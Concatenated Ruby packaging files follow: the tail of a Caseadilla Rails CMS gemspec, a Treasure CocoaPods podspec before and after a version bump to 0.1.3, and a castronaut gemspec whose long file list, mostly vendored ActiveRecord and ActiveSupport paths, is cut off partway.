  spec.description   = "Caseadilla is a CMS for Rails based on Casein and Comfortable Mexican Sofa. It is designed to allow you to easily fit the CMS to your app, not the other way around. By default, Caseadilla installs with Devise for authentication and Declarative Authorization, however it can be installed without either if you want to use an existing auth system."
  spec.summary       = "A powerful yet unobtrusive CMS and data management system for Rails."
  spec.homepage      = "http://www.xavierbick.com"
  spec.license       = "MIT"

  # Fix: "~> 2.0.0" restricts installs to Ruby 2.0.x and rejects 2.1+.
  # The intent is "Ruby 2.0.0 or greater", which is ">= 2.0.0".
  spec.required_ruby_version = ">= 2.0.0"

  spec.files         = `git ls-files`.split($/)
  spec.executables   = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
  spec.test_files    = spec.files.grep(%r{^(test|spec|features)/})
  spec.require_paths = ["lib"]

  spec.add_development_dependency "bundler", "~> 1.3"
  spec.add_development_dependency "rake", "> 0"

  # Legacy RubyGems compatibility: use add_runtime_dependency when supported,
  # otherwise fall back to add_dependency.
  if spec.respond_to? :specification_version then
    spec.specification_version = 4

    if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
      spec.add_runtime_dependency(%q<will_paginate>, ["~> 3.0"])
      spec.add_runtime_dependency(%q<devise>, ["~> 3.2"])
      spec.add_runtime_dependency(%q<zeiv-declarative_authorization>, [">= 1.0.0.pre"])
      spec.add_runtime_dependency(%q<scrypt>, ["~> 1.2"])
      spec.add_runtime_dependency(%q<jquery-rails>, ["> 0"])
    else
      spec.add_dependency(%q<will_paginate>, ["~> 3.0"])
      spec.add_dependency(%q<devise>, ["~> 3.2"])
      spec.add_dependency(%q<zeiv-declarative_authorization>, [">= 1.0.0.pre"])
      # Consistency fix: every other branch constrains scrypt to "~> 1.2",
      # this one said "~> 1.2.1" — align them.
      spec.add_dependency(%q<scrypt>, ["~> 1.2"])
      spec.add_dependency(%q<jquery-rails>, ["> 0"])
    end
  else
    spec.add_dependency(%q<will_paginate>, ["~> 3.0"])
    spec.add_dependency(%q<devise>, ["~> 3.2"])
    spec.add_dependency(%q<zeiv-declarative_authorization>, [">= 1.0.0.pre"])
    spec.add_dependency(%q<scrypt>, ["~> 1.2"])
    spec.add_dependency(%q<jquery-rails>, ["> 0"])
  end
end
|
# CocoaPods specification for Treasure, a JSON API deserialization helper
# library built on top of Lyft's Mapper (published as ModelMapper).
Pod::Spec.new do |s|
  s.name        = 'Treasure'
  s.version     = '0.1.2'
  s.summary     = 'A small set of tools for deserializing JSON API objects.'
  # <<-DESC heredoc: body must stay unindented so no leading whitespace leaks
  # into the description string.
  s.description = <<-DESC
Treasure is a small set of tools on top of Lyft's Mapper library to convert objects according to the JSON API specification.
  DESC
  s.homepage = 'https://github.com/fishermenlabs/Treasure'
  s.license  = { :type => 'MIT', :file => 'LICENSE' }
  s.author   = { 'kfweber' => 'kevinw@fishermenlabs.com' }
  # Tag in the repo must match the version above.
  s.source   = { :git => 'https://github.com/fishermenlabs/Treasure.git', :tag => s.version.to_s }

  # Minimum OS versions per Apple platform.
  s.ios.deployment_target     = '8.0'
  s.osx.deployment_target     = "10.10"
  s.tvos.deployment_target    = "9.0"
  s.watchos.deployment_target = "2.0"

  s.source_files = 'Treasure/Classes/**/*'
  s.dependency 'ModelMapper', '~> 6.0.0'
end
Increase the version number to 0.1.3
# CocoaPods specification for Treasure, a JSON API deserialization helper
# library built on top of Lyft's Mapper (published as ModelMapper).
Pod::Spec.new do |s|
  s.name        = 'Treasure'
  s.version     = '0.1.3'
  s.summary     = 'A small set of tools for deserializing JSON API objects.'
  # <<-DESC heredoc: body must stay unindented so no leading whitespace leaks
  # into the description string.
  s.description = <<-DESC
Treasure is a small set of tools on top of Lyft's Mapper library to convert objects according to the JSON API specification.
  DESC
  s.homepage = 'https://github.com/fishermenlabs/Treasure'
  s.license  = { :type => 'MIT', :file => 'LICENSE' }
  s.author   = { 'kfweber' => 'kevinw@fishermenlabs.com' }
  # Tag in the repo must match the version above.
  s.source   = { :git => 'https://github.com/fishermenlabs/Treasure.git', :tag => s.version.to_s }

  # Minimum OS versions per Apple platform.
  s.ios.deployment_target     = '8.0'
  s.osx.deployment_target     = "10.10"
  s.tvos.deployment_target    = "9.0"
  s.watchos.deployment_target = "2.0"

  s.source_files = 'Treasure/Classes/**/*'
  s.dependency 'ModelMapper', '~> 6.0.0'
end
|
# -*- encoding: utf-8 -*-
Gem::Specification.new do |s|
s.name = %q{castronaut}
s.version = "0.7.2"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.authors = ["Relevance, Inc."]
s.date = %q{2009-05-22}
s.default_executable = %q{castronaut}
s.description = %q{Your friendly, cigar smoking authentication dicator... From Space!}
s.email = %q{aaron@thinkrelevance.com}
s.executables = ["castronaut"]
s.files = [
"MIT-LICENSE",
"README.textile",
"Rakefile",
"app/config.rb",
"app/config.ru",
"app/controllers/application.rb",
"app/public/javascripts/application.js",
"app/public/javascripts/jquery.js",
"app/public/stylesheets/screen.css",
"app/views/layout.erb",
"app/views/login.erb",
"app/views/logout.erb",
"app/views/proxy_validate.erb",
"app/views/service_validate.erb",
"bin/castronaut",
"castronaut.rb",
"config/castronaut.example.yml",
"config/castronaut.sample.yml",
"config/nginx_vhost.conf",
"config/thin_config.yml",
"lib/castronaut.rb",
"lib/castronaut/adapters.rb",
"lib/castronaut/adapters/development/adapter.rb",
"lib/castronaut/adapters/development/user.rb",
"lib/castronaut/adapters/ldap/adapter.rb",
"lib/castronaut/adapters/ldap/user.rb",
"lib/castronaut/adapters/restful_authentication/adapter.rb",
"lib/castronaut/adapters/restful_authentication/user.rb",
"lib/castronaut/authentication_result.rb",
"lib/castronaut/configuration.rb",
"lib/castronaut/db/001_create_cas_database.rb",
"lib/castronaut/models/consumeable.rb",
"lib/castronaut/models/dispenser.rb",
"lib/castronaut/models/login_ticket.rb",
"lib/castronaut/models/proxy_granting_ticket.rb",
"lib/castronaut/models/proxy_ticket.rb",
"lib/castronaut/models/service_ticket.rb",
"lib/castronaut/models/ticket_granting_ticket.rb",
"lib/castronaut/presenters/login.rb",
"lib/castronaut/presenters/logout.rb",
"lib/castronaut/presenters/process_login.rb",
"lib/castronaut/presenters/proxy_validate.rb",
"lib/castronaut/presenters/service_validate.rb",
"lib/castronaut/support/sample.rb",
"lib/castronaut/ticket_result.rb",
"lib/castronaut/utilities/random_string.rb",
"spec/app/controllers/application_spec.rb",
"spec/castronaut/adapters/development/adapter_spec.rb",
"spec/castronaut/adapters/development/user_spec.rb",
"spec/castronaut/adapters/ldap/adapter_spec.rb",
"spec/castronaut/adapters/ldap/user_spec.rb",
"spec/castronaut/adapters/restful_authentication/adapter_spec.rb",
"spec/castronaut/adapters/restful_authentication/user_spec.rb",
"spec/castronaut/adapters_spec.rb",
"spec/castronaut/authentication_result_spec.rb",
"spec/castronaut/configuration_spec.rb",
"spec/castronaut/models/consumeable_spec.rb",
"spec/castronaut/models/dispenser_spec.rb",
"spec/castronaut/models/login_ticket_spec.rb",
"spec/castronaut/models/proxy_granting_ticket_spec.rb",
"spec/castronaut/models/proxy_ticket_spec.rb",
"spec/castronaut/models/service_ticket_spec.rb",
"spec/castronaut/models/ticket_granting_ticket_spec.rb",
"spec/castronaut/presenters/login_spec.rb",
"spec/castronaut/presenters/logout_spec.rb",
"spec/castronaut/presenters/process_login_spec.rb",
"spec/castronaut/presenters/proxy_validate_spec.rb",
"spec/castronaut/presenters/service_validate_spec.rb",
"spec/castronaut/ticket_result_spec.rb",
"spec/castronaut/utilities/random_string_spec.rb",
"spec/castronaut_spec.rb",
"spec/spec.opts",
"spec/spec_controller_helper.rb",
"spec/spec_helper.rb",
"spec/spec_rails_mocks.rb",
"vendor/activerecord/CHANGELOG",
"vendor/activerecord/README",
"vendor/activerecord/RUNNING_UNIT_TESTS",
"vendor/activerecord/Rakefile",
"vendor/activerecord/examples/associations.png",
"vendor/activerecord/install.rb",
"vendor/activerecord/lib/active_record.rb",
"vendor/activerecord/lib/active_record/aggregations.rb",
"vendor/activerecord/lib/active_record/association_preload.rb",
"vendor/activerecord/lib/active_record/associations.rb",
"vendor/activerecord/lib/active_record/associations/association_collection.rb",
"vendor/activerecord/lib/active_record/associations/association_proxy.rb",
"vendor/activerecord/lib/active_record/associations/belongs_to_association.rb",
"vendor/activerecord/lib/active_record/associations/belongs_to_polymorphic_association.rb",
"vendor/activerecord/lib/active_record/associations/has_and_belongs_to_many_association.rb",
"vendor/activerecord/lib/active_record/associations/has_many_association.rb",
"vendor/activerecord/lib/active_record/associations/has_many_through_association.rb",
"vendor/activerecord/lib/active_record/associations/has_one_association.rb",
"vendor/activerecord/lib/active_record/associations/has_one_through_association.rb",
"vendor/activerecord/lib/active_record/attribute_methods.rb",
"vendor/activerecord/lib/active_record/base.rb",
"vendor/activerecord/lib/active_record/calculations.rb",
"vendor/activerecord/lib/active_record/callbacks.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/connection_pool.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/connection_specification.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/database_statements.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/query_cache.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/quoting.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/schema_definitions.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/schema_statements.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract_adapter.rb",
"vendor/activerecord/lib/active_record/connection_adapters/mysql_adapter.rb",
"vendor/activerecord/lib/active_record/connection_adapters/postgresql_adapter.rb",
"vendor/activerecord/lib/active_record/connection_adapters/sqlite3_adapter.rb",
"vendor/activerecord/lib/active_record/connection_adapters/sqlite_adapter.rb",
"vendor/activerecord/lib/active_record/dirty.rb",
"vendor/activerecord/lib/active_record/dynamic_finder_match.rb",
"vendor/activerecord/lib/active_record/fixtures.rb",
"vendor/activerecord/lib/active_record/i18n_interpolation_deprecation.rb",
"vendor/activerecord/lib/active_record/locale/en.yml",
"vendor/activerecord/lib/active_record/locking/optimistic.rb",
"vendor/activerecord/lib/active_record/locking/pessimistic.rb",
"vendor/activerecord/lib/active_record/migration.rb",
"vendor/activerecord/lib/active_record/named_scope.rb",
"vendor/activerecord/lib/active_record/observer.rb",
"vendor/activerecord/lib/active_record/query_cache.rb",
"vendor/activerecord/lib/active_record/reflection.rb",
"vendor/activerecord/lib/active_record/schema.rb",
"vendor/activerecord/lib/active_record/schema_dumper.rb",
"vendor/activerecord/lib/active_record/serialization.rb",
"vendor/activerecord/lib/active_record/serializers/json_serializer.rb",
"vendor/activerecord/lib/active_record/serializers/xml_serializer.rb",
"vendor/activerecord/lib/active_record/test_case.rb",
"vendor/activerecord/lib/active_record/timestamp.rb",
"vendor/activerecord/lib/active_record/transactions.rb",
"vendor/activerecord/lib/active_record/validations.rb",
"vendor/activerecord/lib/active_record/version.rb",
"vendor/activerecord/lib/activerecord.rb",
"vendor/activerecord/test/assets/example.log",
"vendor/activerecord/test/assets/flowers.jpg",
"vendor/activerecord/test/cases/aaa_create_tables_test.rb",
"vendor/activerecord/test/cases/active_schema_test_mysql.rb",
"vendor/activerecord/test/cases/active_schema_test_postgresql.rb",
"vendor/activerecord/test/cases/adapter_test.rb",
"vendor/activerecord/test/cases/aggregations_test.rb",
"vendor/activerecord/test/cases/ar_schema_test.rb",
"vendor/activerecord/test/cases/associations/belongs_to_associations_test.rb",
"vendor/activerecord/test/cases/associations/callbacks_test.rb",
"vendor/activerecord/test/cases/associations/cascaded_eager_loading_test.rb",
"vendor/activerecord/test/cases/associations/eager_load_includes_full_sti_class_test.rb",
"vendor/activerecord/test/cases/associations/eager_load_nested_include_test.rb",
"vendor/activerecord/test/cases/associations/eager_singularization_test.rb",
"vendor/activerecord/test/cases/associations/eager_test.rb",
"vendor/activerecord/test/cases/associations/extension_test.rb",
"vendor/activerecord/test/cases/associations/has_and_belongs_to_many_associations_test.rb",
"vendor/activerecord/test/cases/associations/has_many_associations_test.rb",
"vendor/activerecord/test/cases/associations/has_many_through_associations_test.rb",
"vendor/activerecord/test/cases/associations/has_one_associations_test.rb",
"vendor/activerecord/test/cases/associations/has_one_through_associations_test.rb",
"vendor/activerecord/test/cases/associations/inner_join_association_test.rb",
"vendor/activerecord/test/cases/associations/join_model_test.rb",
"vendor/activerecord/test/cases/associations_test.rb",
"vendor/activerecord/test/cases/attribute_methods_test.rb",
"vendor/activerecord/test/cases/base_test.rb",
"vendor/activerecord/test/cases/binary_test.rb",
"vendor/activerecord/test/cases/calculations_test.rb",
"vendor/activerecord/test/cases/callbacks_observers_test.rb",
"vendor/activerecord/test/cases/callbacks_test.rb",
"vendor/activerecord/test/cases/class_inheritable_attributes_test.rb",
"vendor/activerecord/test/cases/column_alias_test.rb",
"vendor/activerecord/test/cases/column_definition_test.rb",
"vendor/activerecord/test/cases/connection_test_firebird.rb",
"vendor/activerecord/test/cases/connection_test_mysql.rb",
"vendor/activerecord/test/cases/copy_table_test_sqlite.rb",
"vendor/activerecord/test/cases/database_statements_test.rb",
"vendor/activerecord/test/cases/datatype_test_postgresql.rb",
"vendor/activerecord/test/cases/date_time_test.rb",
"vendor/activerecord/test/cases/default_test_firebird.rb",
"vendor/activerecord/test/cases/defaults_test.rb",
"vendor/activerecord/test/cases/deprecated_finder_test.rb",
"vendor/activerecord/test/cases/dirty_test.rb",
"vendor/activerecord/test/cases/finder_respond_to_test.rb",
"vendor/activerecord/test/cases/finder_test.rb",
"vendor/activerecord/test/cases/fixtures_test.rb",
"vendor/activerecord/test/cases/helper.rb",
"vendor/activerecord/test/cases/i18n_test.rb",
"vendor/activerecord/test/cases/inheritance_test.rb",
"vendor/activerecord/test/cases/invalid_date_test.rb",
"vendor/activerecord/test/cases/json_serialization_test.rb",
"vendor/activerecord/test/cases/lifecycle_test.rb",
"vendor/activerecord/test/cases/locking_test.rb",
"vendor/activerecord/test/cases/method_scoping_test.rb",
"vendor/activerecord/test/cases/migration_test.rb",
"vendor/activerecord/test/cases/migration_test_firebird.rb",
"vendor/activerecord/test/cases/mixin_test.rb",
"vendor/activerecord/test/cases/modules_test.rb",
"vendor/activerecord/test/cases/multiple_db_test.rb",
"vendor/activerecord/test/cases/named_scope_test.rb",
"vendor/activerecord/test/cases/pk_test.rb",
"vendor/activerecord/test/cases/pooled_connections_test.rb",
"vendor/activerecord/test/cases/query_cache_test.rb",
"vendor/activerecord/test/cases/readonly_test.rb",
"vendor/activerecord/test/cases/reflection_test.rb",
"vendor/activerecord/test/cases/reload_models_test.rb",
"vendor/activerecord/test/cases/reserved_word_test_mysql.rb",
"vendor/activerecord/test/cases/sanitize_test.rb",
"vendor/activerecord/test/cases/schema_authorization_test_postgresql.rb",
"vendor/activerecord/test/cases/schema_dumper_test.rb",
"vendor/activerecord/test/cases/schema_test_postgresql.rb",
"vendor/activerecord/test/cases/serialization_test.rb",
"vendor/activerecord/test/cases/synonym_test_oracle.rb",
"vendor/activerecord/test/cases/transactions_test.rb",
"vendor/activerecord/test/cases/unconnected_test.rb",
"vendor/activerecord/test/cases/validations_i18n_test.rb",
"vendor/activerecord/test/cases/validations_test.rb",
"vendor/activerecord/test/cases/xml_serialization_test.rb",
"vendor/activerecord/test/config.rb",
"vendor/activerecord/test/connections/native_db2/connection.rb",
"vendor/activerecord/test/connections/native_firebird/connection.rb",
"vendor/activerecord/test/connections/native_frontbase/connection.rb",
"vendor/activerecord/test/connections/native_mysql/connection.rb",
"vendor/activerecord/test/connections/native_openbase/connection.rb",
"vendor/activerecord/test/connections/native_oracle/connection.rb",
"vendor/activerecord/test/connections/native_postgresql/connection.rb",
"vendor/activerecord/test/connections/native_sqlite/connection.rb",
"vendor/activerecord/test/connections/native_sqlite3/connection.rb",
"vendor/activerecord/test/connections/native_sqlite3/in_memory_connection.rb",
"vendor/activerecord/test/connections/native_sybase/connection.rb",
"vendor/activerecord/test/fixtures/accounts.yml",
"vendor/activerecord/test/fixtures/all/developers.yml",
"vendor/activerecord/test/fixtures/all/people.csv",
"vendor/activerecord/test/fixtures/all/tasks.yml",
"vendor/activerecord/test/fixtures/author_addresses.yml",
"vendor/activerecord/test/fixtures/author_favorites.yml",
"vendor/activerecord/test/fixtures/authors.yml",
"vendor/activerecord/test/fixtures/binaries.yml",
"vendor/activerecord/test/fixtures/books.yml",
"vendor/activerecord/test/fixtures/categories.yml",
"vendor/activerecord/test/fixtures/categories/special_categories.yml",
"vendor/activerecord/test/fixtures/categories/subsubdir/arbitrary_filename.yml",
"vendor/activerecord/test/fixtures/categories_ordered.yml",
"vendor/activerecord/test/fixtures/categories_posts.yml",
"vendor/activerecord/test/fixtures/categorizations.yml",
"vendor/activerecord/test/fixtures/clubs.yml",
"vendor/activerecord/test/fixtures/comments.yml",
"vendor/activerecord/test/fixtures/companies.yml",
"vendor/activerecord/test/fixtures/computers.yml",
"vendor/activerecord/test/fixtures/courses.yml",
"vendor/activerecord/test/fixtures/customers.yml",
"vendor/activerecord/test/fixtures/developers.yml",
"vendor/activerecord/test/fixtures/developers_projects.yml",
"vendor/activerecord/test/fixtures/edges.yml",
"vendor/activerecord/test/fixtures/entrants.yml",
"vendor/activerecord/test/fixtures/fixture_database.sqlite3",
"vendor/activerecord/test/fixtures/fixture_database_2.sqlite3",
"vendor/activerecord/test/fixtures/fk_test_has_fk.yml",
"vendor/activerecord/test/fixtures/fk_test_has_pk.yml",
"vendor/activerecord/test/fixtures/funny_jokes.yml",
"vendor/activerecord/test/fixtures/items.yml",
"vendor/activerecord/test/fixtures/jobs.yml",
"vendor/activerecord/test/fixtures/legacy_things.yml",
"vendor/activerecord/test/fixtures/mateys.yml",
"vendor/activerecord/test/fixtures/members.yml",
"vendor/activerecord/test/fixtures/memberships.yml",
"vendor/activerecord/test/fixtures/minimalistics.yml",
"vendor/activerecord/test/fixtures/mixed_case_monkeys.yml",
"vendor/activerecord/test/fixtures/mixins.yml",
"vendor/activerecord/test/fixtures/movies.yml",
"vendor/activerecord/test/fixtures/naked/csv/accounts.csv",
"vendor/activerecord/test/fixtures/naked/yml/accounts.yml",
"vendor/activerecord/test/fixtures/naked/yml/companies.yml",
"vendor/activerecord/test/fixtures/naked/yml/courses.yml",
"vendor/activerecord/test/fixtures/organizations.yml",
"vendor/activerecord/test/fixtures/owners.yml",
"vendor/activerecord/test/fixtures/parrots.yml",
"vendor/activerecord/test/fixtures/parrots_pirates.yml",
"vendor/activerecord/test/fixtures/people.yml",
"vendor/activerecord/test/fixtures/pets.yml",
"vendor/activerecord/test/fixtures/pirates.yml",
"vendor/activerecord/test/fixtures/posts.yml",
"vendor/activerecord/test/fixtures/price_estimates.yml",
"vendor/activerecord/test/fixtures/projects.yml",
"vendor/activerecord/test/fixtures/readers.yml",
"vendor/activerecord/test/fixtures/references.yml",
"vendor/activerecord/test/fixtures/reserved_words/distinct.yml",
"vendor/activerecord/test/fixtures/reserved_words/distincts_selects.yml",
"vendor/activerecord/test/fixtures/reserved_words/group.yml",
"vendor/activerecord/test/fixtures/reserved_words/select.yml",
"vendor/activerecord/test/fixtures/reserved_words/values.yml",
"vendor/activerecord/test/fixtures/ships.yml",
"vendor/activerecord/test/fixtures/sponsors.yml",
"vendor/activerecord/test/fixtures/subscribers.yml",
"vendor/activerecord/test/fixtures/subscriptions.yml",
"vendor/activerecord/test/fixtures/taggings.yml",
"vendor/activerecord/test/fixtures/tags.yml",
"vendor/activerecord/test/fixtures/tasks.yml",
"vendor/activerecord/test/fixtures/topics.yml",
"vendor/activerecord/test/fixtures/treasures.yml",
"vendor/activerecord/test/fixtures/vertices.yml",
"vendor/activerecord/test/fixtures/warehouse-things.yml",
"vendor/activerecord/test/migrations/broken/100_migration_that_raises_exception.rb",
"vendor/activerecord/test/migrations/decimal/1_give_me_big_numbers.rb",
"vendor/activerecord/test/migrations/duplicate/1_people_have_last_names.rb",
"vendor/activerecord/test/migrations/duplicate/2_we_need_reminders.rb",
"vendor/activerecord/test/migrations/duplicate/3_foo.rb",
"vendor/activerecord/test/migrations/duplicate/3_innocent_jointable.rb",
"vendor/activerecord/test/migrations/duplicate_names/20080507052938_chunky.rb",
"vendor/activerecord/test/migrations/duplicate_names/20080507053028_chunky.rb",
"vendor/activerecord/test/migrations/interleaved/pass_1/3_innocent_jointable.rb",
"vendor/activerecord/test/migrations/interleaved/pass_2/1_people_have_last_names.rb",
"vendor/activerecord/test/migrations/interleaved/pass_2/3_innocent_jointable.rb",
"vendor/activerecord/test/migrations/interleaved/pass_3/1_people_have_last_names.rb",
"vendor/activerecord/test/migrations/interleaved/pass_3/2_i_raise_on_down.rb",
"vendor/activerecord/test/migrations/interleaved/pass_3/3_innocent_jointable.rb",
"vendor/activerecord/test/migrations/missing/1000_people_have_middle_names.rb",
"vendor/activerecord/test/migrations/missing/1_people_have_last_names.rb",
"vendor/activerecord/test/migrations/missing/3_we_need_reminders.rb",
"vendor/activerecord/test/migrations/missing/4_innocent_jointable.rb",
"vendor/activerecord/test/migrations/valid/1_people_have_last_names.rb",
"vendor/activerecord/test/migrations/valid/2_we_need_reminders.rb",
"vendor/activerecord/test/migrations/valid/3_innocent_jointable.rb",
"vendor/activerecord/test/models/author.rb",
"vendor/activerecord/test/models/auto_id.rb",
"vendor/activerecord/test/models/binary.rb",
"vendor/activerecord/test/models/book.rb",
"vendor/activerecord/test/models/categorization.rb",
"vendor/activerecord/test/models/category.rb",
"vendor/activerecord/test/models/citation.rb",
"vendor/activerecord/test/models/club.rb",
"vendor/activerecord/test/models/column_name.rb",
"vendor/activerecord/test/models/comment.rb",
"vendor/activerecord/test/models/company.rb",
"vendor/activerecord/test/models/company_in_module.rb",
"vendor/activerecord/test/models/computer.rb",
"vendor/activerecord/test/models/contact.rb",
"vendor/activerecord/test/models/course.rb",
"vendor/activerecord/test/models/customer.rb",
"vendor/activerecord/test/models/default.rb",
"vendor/activerecord/test/models/developer.rb",
"vendor/activerecord/test/models/edge.rb",
"vendor/activerecord/test/models/entrant.rb",
"vendor/activerecord/test/models/guid.rb",
"vendor/activerecord/test/models/item.rb",
"vendor/activerecord/test/models/job.rb",
"vendor/activerecord/test/models/joke.rb",
"vendor/activerecord/test/models/keyboard.rb",
"vendor/activerecord/test/models/legacy_thing.rb",
"vendor/activerecord/test/models/matey.rb",
"vendor/activerecord/test/models/member.rb",
"vendor/activerecord/test/models/member_detail.rb",
"vendor/activerecord/test/models/membership.rb",
"vendor/activerecord/test/models/minimalistic.rb",
"vendor/activerecord/test/models/mixed_case_monkey.rb",
"vendor/activerecord/test/models/movie.rb",
"vendor/activerecord/test/models/order.rb",
"vendor/activerecord/test/models/organization.rb",
"vendor/activerecord/test/models/owner.rb",
"vendor/activerecord/test/models/parrot.rb",
"vendor/activerecord/test/models/person.rb",
"vendor/activerecord/test/models/pet.rb",
"vendor/activerecord/test/models/pirate.rb",
"vendor/activerecord/test/models/post.rb",
"vendor/activerecord/test/models/price_estimate.rb",
"vendor/activerecord/test/models/project.rb",
"vendor/activerecord/test/models/reader.rb",
"vendor/activerecord/test/models/reference.rb",
"vendor/activerecord/test/models/reply.rb",
"vendor/activerecord/test/models/ship.rb",
"vendor/activerecord/test/models/sponsor.rb",
"vendor/activerecord/test/models/subject.rb",
"vendor/activerecord/test/models/subscriber.rb",
"vendor/activerecord/test/models/subscription.rb",
"vendor/activerecord/test/models/tag.rb",
"vendor/activerecord/test/models/tagging.rb",
"vendor/activerecord/test/models/task.rb",
"vendor/activerecord/test/models/topic.rb",
"vendor/activerecord/test/models/treasure.rb",
"vendor/activerecord/test/models/vertex.rb",
"vendor/activerecord/test/models/warehouse_thing.rb",
"vendor/activerecord/test/schema/mysql_specific_schema.rb",
"vendor/activerecord/test/schema/postgresql_specific_schema.rb",
"vendor/activerecord/test/schema/schema.rb",
"vendor/activerecord/test/schema/schema2.rb",
"vendor/activerecord/test/schema/sqlite_specific_schema.rb",
"vendor/activesupport/CHANGELOG",
"vendor/activesupport/README",
"vendor/activesupport/lib/active_support.rb",
"vendor/activesupport/lib/active_support/base64.rb",
"vendor/activesupport/lib/active_support/basic_object.rb",
"vendor/activesupport/lib/active_support/buffered_logger.rb",
"vendor/activesupport/lib/active_support/cache.rb",
"vendor/activesupport/lib/active_support/cache/compressed_mem_cache_store.rb",
"vendor/activesupport/lib/active_support/cache/drb_store.rb",
"vendor/activesupport/lib/active_support/cache/file_store.rb",
"vendor/activesupport/lib/active_support/cache/mem_cache_store.rb",
"vendor/activesupport/lib/active_support/cache/memory_store.rb",
"vendor/activesupport/lib/active_support/cache/synchronized_memory_store.rb",
"vendor/activesupport/lib/active_support/callbacks.rb",
"vendor/activesupport/lib/active_support/core_ext.rb",
"vendor/activesupport/lib/active_support/core_ext/array.rb",
"vendor/activesupport/lib/active_support/core_ext/array/access.rb",
"vendor/activesupport/lib/active_support/core_ext/array/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/array/extract_options.rb",
"vendor/activesupport/lib/active_support/core_ext/array/grouping.rb",
"vendor/activesupport/lib/active_support/core_ext/array/random_access.rb",
"vendor/activesupport/lib/active_support/core_ext/base64.rb",
"vendor/activesupport/lib/active_support/core_ext/base64/encoding.rb",
"vendor/activesupport/lib/active_support/core_ext/benchmark.rb",
"vendor/activesupport/lib/active_support/core_ext/bigdecimal.rb",
"vendor/activesupport/lib/active_support/core_ext/bigdecimal/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/blank.rb",
"vendor/activesupport/lib/active_support/core_ext/cgi.rb",
"vendor/activesupport/lib/active_support/core_ext/cgi/escape_skipping_slashes.rb",
"vendor/activesupport/lib/active_support/core_ext/class.rb",
"vendor/activesupport/lib/active_support/core_ext/class/attribute_accessors.rb",
"vendor/activesupport/lib/active_support/core_ext/class/delegating_attributes.rb",
"vendor/activesupport/lib/active_support/core_ext/class/inheritable_attributes.rb",
"vendor/activesupport/lib/active_support/core_ext/class/removal.rb",
"vendor/activesupport/lib/active_support/core_ext/date.rb",
"vendor/activesupport/lib/active_support/core_ext/date/behavior.rb",
"vendor/activesupport/lib/active_support/core_ext/date/calculations.rb",
"vendor/activesupport/lib/active_support/core_ext/date/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/date_time.rb",
"vendor/activesupport/lib/active_support/core_ext/date_time/calculations.rb",
"vendor/activesupport/lib/active_support/core_ext/date_time/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/duplicable.rb",
"vendor/activesupport/lib/active_support/core_ext/enumerable.rb",
"vendor/activesupport/lib/active_support/core_ext/exception.rb",
"vendor/activesupport/lib/active_support/core_ext/file.rb",
"vendor/activesupport/lib/active_support/core_ext/file/atomic.rb",
"vendor/activesupport/lib/active_support/core_ext/float.rb",
"vendor/activesupport/lib/active_support/core_ext/float/rounding.rb",
"vendor/activesupport/lib/active_support/core_ext/float/time.rb",
"vendor/activesupport/lib/active_support/core_ext/hash.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/deep_merge.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/diff.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/except.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/indifferent_access.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/keys.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/reverse_merge.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/slice.rb",
"vendor/activesupport/lib/active_support/core_ext/integer.rb",
"vendor/activesupport/lib/active_support/core_ext/integer/even_odd.rb",
"vendor/activesupport/lib/active_support/core_ext/integer/inflections.rb",
"vendor/activesupport/lib/active_support/core_ext/integer/time.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel/agnostics.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel/daemonizing.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel/debugger.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel/reporting.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel/requires.rb",
"vendor/activesupport/lib/active_support/core_ext/load_error.rb",
"vendor/activesupport/lib/active_support/core_ext/logger.rb",
"vendor/activesupport/lib/active_support/core_ext/module.rb",
"vendor/activesupport/lib/active_support/core_ext/module/aliasing.rb",
"vendor/activesupport/lib/active_support/core_ext/module/attr_accessor_with_default.rb",
"vendor/activesupport/lib/active_support/core_ext/module/attr_internal.rb",
"vendor/activesupport/lib/active_support/core_ext/module/attribute_accessors.rb",
"vendor/activesupport/lib/active_support/core_ext/module/delegation.rb",
"vendor/activesupport/lib/active_support/core_ext/module/inclusion.rb",
"vendor/activesupport/lib/active_support/core_ext/module/introspection.rb",
"vendor/activesupport/lib/active_support/core_ext/module/loading.rb",
"vendor/activesupport/lib/active_support/core_ext/module/model_naming.rb",
"vendor/activesupport/lib/active_support/core_ext/module/synchronization.rb",
"vendor/activesupport/lib/active_support/core_ext/name_error.rb",
"vendor/activesupport/lib/active_support/core_ext/numeric.rb",
"vendor/activesupport/lib/active_support/core_ext/numeric/bytes.rb",
"vendor/activesupport/lib/active_support/core_ext/numeric/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/numeric/time.rb",
"vendor/activesupport/lib/active_support/core_ext/object.rb",
"vendor/activesupport/lib/active_support/core_ext/object/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/object/extending.rb",
"vendor/activesupport/lib/active_support/core_ext/object/instance_variables.rb",
"vendor/activesupport/lib/active_support/core_ext/object/metaclass.rb",
"vendor/activesupport/lib/active_support/core_ext/object/misc.rb",
"vendor/activesupport/lib/active_support/core_ext/pathname.rb",
